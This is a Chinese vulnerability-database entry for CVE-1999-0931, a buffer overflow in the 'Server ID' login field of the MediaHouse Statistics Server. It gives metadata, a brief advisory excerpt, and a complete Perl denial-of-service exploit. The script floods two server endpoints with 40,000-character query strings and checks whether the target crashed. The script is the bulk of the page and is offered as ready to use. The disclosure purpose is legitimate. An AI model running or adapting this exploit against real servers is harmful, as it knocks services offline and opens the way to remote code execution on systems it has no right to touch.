MediaHouse统计服务器“服务器ID”缓冲区溢出漏洞

MediaHouse统计服务器“服务器ID”缓冲区溢出漏洞

漏洞ID 1105561 漏洞类型 缓冲区溢出
发布时间 1999-09-30 更新时间 2005-05-02
图片[1]-MediaHouse统计服务器“服务器ID”缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0931
图片[2]-MediaHouse统计服务器“服务器ID”缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199909-058
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19562
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-058
|漏洞详情
MediaHouse统计服务器中存在缓冲区溢出漏洞。远程攻击者利用该漏洞执行命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/734/info

The web interface for Statistics Server contains an unchecked buffer which accepts input from the "Server ID" field of the login webpage. While the login webpage has a 16 character restriction, this is easily circumventible by editing the HTML to remove the restriction. Entering a string of more than 3773 characters will crash the server. This bug could potentially be used to remotely execute arbitrary code. 

#!/usr/bin/perl

###############################################################
# Sample DoS against the Mediahouse Statistics Server
# This was tested against 4.28 & 5.01 running on Windows NT 4.0
#
# Only use it to determine if your own Server is vulnerable!
#
# Per Bergehed ([email protected])
#
# http://w1.855.telia.com/~u85513179/security/exploits/mediahouse.html
#
# V1.0 - Check for "ss?form=statsredir&ID=..." buffer overflow.
# V1.1 - added check for "ss?form=setsite&ID=..." buffer overflow.
#

use IO::Socket;

print "############################################################n";
print "# Simple DoS-attack against the Mediahouse Statistics Servern";
print "# Tested with version 4.28 & 5.01n";
print "n";

if ($#ARGV != 0) 
{
        die "-> Please give the host address as argument.n"
}

opensocket ("n");
print $remote "GET " . "ss?setsite=" . "A" x 40000 . "& HTTP/1.0nn";
print $remote "GET " . "ss?form=statsredir&ID=" . "A" x 40000 . "& HTTP/1.0nn";
close $remote;

opensocket ("n-> The server seemed to be vulnerable to this attackn");
close $remote;
die "-> The server does not seem to be vulnerable to this attackn";

sub opensocket 
{
        $remote = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $ARGV[0],
                PeerPort => "http(80)",
        ) || die "# Can't open http-port on $ARGV[0]$_[0]";
        $remote->autoflush(1)
}

# EOF
|参考资料

来源:BID
名称:734
链接:http://www.securityfocus.com/bid/734

相关推荐: LICQ Hostile URL Command Execution Vulnerability

LICQ Hostile URL Command Execution Vulnerability 漏洞ID 1103428 漏洞类型 Input Validation Error 发布时间 2001-02-14 更新时间 2001-02-14 CVE编号 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享